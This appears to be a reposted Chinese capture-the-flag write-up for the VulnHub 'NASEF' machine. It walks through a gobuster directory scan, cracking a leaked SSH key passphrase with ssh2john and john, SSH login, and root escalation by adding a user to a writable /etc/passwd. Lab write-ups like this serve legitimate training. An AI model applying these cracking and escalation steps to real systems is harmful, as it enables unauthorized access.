vulnhub--nasef

描述

总司令:你好,特工R,两个小时前,我们与特工(NASEF)失去了联系。他在敌国“ SOURG”中执行秘密任务。您的任务是带领工作组安全地将他带到我们的家园,但是首先我们需要侵入SOURG的卫星中,以找到代表nasef坐标的用户和根标志。祝你好运

难度:容易

目录

一、信息收集

1.nmap端口扫描

2.gobuster目录扫描

二、漏洞探测

1.复制到本地,进行ssh私钥破解

2.john 解密

三、漏洞利用

1.ssh登入,用户:agentr;秘钥:reading

四、提权

/etc/passwd 可读,添加新用户

五、总结


一、信息收集

1.nmap端口扫描

2.gobuster目录扫描

gobuster dir -u 192.168.1.184 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt git php

泄露了ssh的秘钥key

192.168.1.184/goodmath.txt

二、漏洞探测

1.复制到本地,进行ssh私钥破解

将密钥转换为可破解的哈希,然后将其输入到名为croch的文本文件中

python3 ssh2john.py key> croch

2.john 解密

三、漏洞利用

1.ssh登入,用户:agentr;秘钥:reading

查看第一次坐标。

四、提权

/etc/passwd 可读,添加新用户

mkpasswd -m SHA-512 ,密码:123456

切换su  test,成功提权。

查看第二坐标。

五、总结

  • gobuster dir -u ip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt git php #目录扫描,txt,git,php文件

  • ssh私钥破解

python3 ssh2john.py key> croch  #将密钥转换为可破解的哈希

john --wordlist=/usr/share/wordlists/rockyou.txt  croch #使用密码字典rockyou.txt破解

来源:https://www.icode9.com/content-4-898001.html

(0)

相关推荐